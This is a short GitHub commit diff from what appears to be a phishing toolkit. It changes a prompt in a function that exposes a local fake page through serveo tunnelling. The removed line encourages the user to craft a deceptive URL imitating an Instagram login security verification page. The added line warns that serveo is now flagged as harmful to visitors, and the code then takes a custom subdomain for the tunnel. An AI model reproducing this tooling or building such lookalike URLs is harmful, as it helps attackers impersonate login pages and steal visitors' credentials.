SERVEO - WARNING ADDED

This commit is contained in:
AnonUD4Y 2019-01-14 02:03:29 +05:30 committed by GitHub
parent e68cf10de6
commit ba169794ab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -105,7 +105,7 @@ def runNgrok():
break
def runServeo():
print(_("\n {0}[ YOU CAN MAKE A TRICKY URL LIKE ] \n (http ://instagram.Login.Security.verification.serveo[.]net) \n\n\n {0}Insert a custom subdomain for serveo").format(RED, DEFAULT))
print(_("\n {0}[ BE CAREFUL ! SERVEO NOW TREATED AS HARMFUL FOR VISITORS ! STAY UPDATED !!]) \n\n\n {0}Insert a custom subdomain for serveo").format(RED, DEFAULT))
lnk = input(_("\n {0}CUSTOM Subdomain>>> {1}").format(RED, DEFAULT))
if not ".serveo.net" in lnk:
lnk += ".serveo.net"